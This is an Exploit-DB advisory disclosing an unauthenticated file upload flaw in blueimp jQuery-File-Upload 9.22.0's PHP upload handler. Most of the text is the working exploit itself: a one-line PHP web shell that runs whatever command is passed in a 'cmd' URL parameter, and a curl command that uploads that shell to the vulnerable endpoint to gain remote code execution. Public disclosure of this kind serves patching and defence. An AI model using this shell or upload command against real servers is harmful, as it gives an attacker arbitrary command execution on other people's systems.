EDB-ID: 45584 | Author: Larry W. Cashdollar | Published: 2018-10-11 | CVE: N/A | Type: Webapps | Platform: PHP | Vulnerable App: N/A | # Author: Larry W. Cashdollar, @_larry0
# Date: 2018-10-09
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
# CVE-ID: N/A
# Vulnerability:
# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php
# doesn't require any validation to upload files to the server. It also doesn't exclude file types.
# This allows for remote code execution.
# shell.php:
<?php $cmd=$_GET['cmd']; system($cmd);?>
# Exploit Code:
$ curl -F "[email protected]" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
